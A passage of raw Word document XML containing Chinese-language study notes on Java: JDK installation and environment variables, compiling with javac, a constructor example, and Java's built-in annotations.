      <w:hyperlink r:id="rId212" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="006600"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.oracle.com/java/technologies/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45971F5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候也会安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JRE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，安装目录通常为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\Java\jdk1.8.0_91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B20C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要添加的环境变量有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA_HOME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CLASSPATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要设置该变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47456502" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C40DB16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>变量名：</w:t>
      </w:r>
      <w:r>
        <w:t>JAVA_HOME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21C144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>变量值：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C:\Program Files (x86)\Java\jdk1.8.0_91        // </w:t>
      </w:r>
      <w:r>
        <w:t>要根据自己的实际路径配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D004B94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>变量名：</w:t>
      </w:r>
      <w:r>
        <w:t>CLASSPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6072F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>变量值：</w:t>
      </w:r>
      <w:r>
        <w:t>.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;         //</w:t>
      </w:r>
      <w:r>
        <w:t>记得前面有个</w:t>
      </w:r>
      <w:r>
        <w:t>"."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02272D80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>变量名：</w:t>
      </w:r>
      <w:r>
        <w:t>Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34092AB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>变量值：</w:t>
      </w:r>
      <w:r>
        <w:t>%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8968F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A74C1E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDEA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId213" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="006600"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/idea/download/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C3F2EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译时解决编码问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF27829" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>javac -encoding UTF-8 HelloWorld.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F89E00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>java HelloWorld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD24F6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:t>源程序与编译型运行区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DD1F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="61740134" wp14:editId="3A5F0075">
            <wp:extent cx="3356610" cy="1496695"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="2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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3356610" cy="1496695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC50D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>魔术方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA506DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32053B2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>构造方法的名称必须与类同名，一个类可以有多个构造方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC26F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class Puppy{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F5747" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public Puppy(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61340333" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236BB583" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public Puppy(String name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F3156" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个构造器仅有一个参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4ACC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54FD93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A90BB7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7537AC" w14:textId="2BEF179B" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6962DD" w14:textId="7C026BAF" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03EA09A5" w14:textId="4480B62A" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D93E14" w14:textId="612F506B" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2CF9D3" w14:textId="2B791581" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394F2A01" w14:textId="750A027C" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AC775" w14:textId="6D02CC49" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F64053B" w14:textId="6851848D" w:rsidR="001742ED" w:rsidRDefault="00EE1ABA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1ABA">
        <w:t>https://blog.csdn.net/doc_sgl/article/details/50367083</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604FA1EE" w14:textId="6A0418D3" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A231DE4" w14:textId="48DF4B31" w:rsidR="004E1847" w:rsidRDefault="000A4B43" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义了一套注解，共有</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个在</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，剩下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个在</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.lang.annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4B43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05819EF2" w14:textId="77777777" w:rsidR="00B14C62" w:rsidRPr="00985DFF" w:rsidRDefault="00B14C62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Override - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>检查该方法是否是重写方法。如果发现其父类，或者是引用的接口中并没有该方法时，会报编译错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB4CFB" w14:textId="77777777" w:rsidR="00B14C62" w:rsidRPr="00985DFF" w:rsidRDefault="00B14C62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Deprecated - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标记过时方法。如果使用该方法，会报编译警告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4A9C2" w14:textId="24851353" w:rsidR="004E1847" w:rsidRPr="00893D50" w:rsidRDefault="00B14C62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@SuppressWarnings - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指示编译器去忽略注解中声明的警告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58671990" w14:textId="77777777" w:rsidR="004E1847" w:rsidRDefault="004E1847" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E81269C" w14:textId="36DB27E8" w:rsidR="001F3902" w:rsidRDefault="001F3902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用在其他注解的注解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元注解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB308CF" w14:textId="77777777" w:rsidR="001F3902" w:rsidRPr="00985DFF" w:rsidRDefault="001F3902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Retention - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标识这个注解怎么保存，是只在代码中，还是编入</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件中，或者是在运行时可以通过反射访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65DABF" w14:textId="77777777" w:rsidR="001F3902" w:rsidRPr="00985DFF" w:rsidRDefault="001F3902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Documented - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标记这些注解是否包含在用户文档中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44859A71" w14:textId="77777777" w:rsidR="001F3902" w:rsidRPr="00985DFF" w:rsidRDefault="001F3902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Target - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标记这个注解应该是哪种</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>成员。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356C9C6" w14:textId="5482BEB6" w:rsidR="001742ED" w:rsidRDefault="001F3902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Inherited - </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标记这个注解是继承于哪个注解类</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注解并没有继承于任何子类</w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D30DE77" w14:textId="66D35FC8" w:rsidR="00896896" w:rsidRDefault="00896896" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9587DA" w14:textId="21842305" w:rsidR="004D1246" w:rsidRDefault="004D1246" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始，额外添加了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个注解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
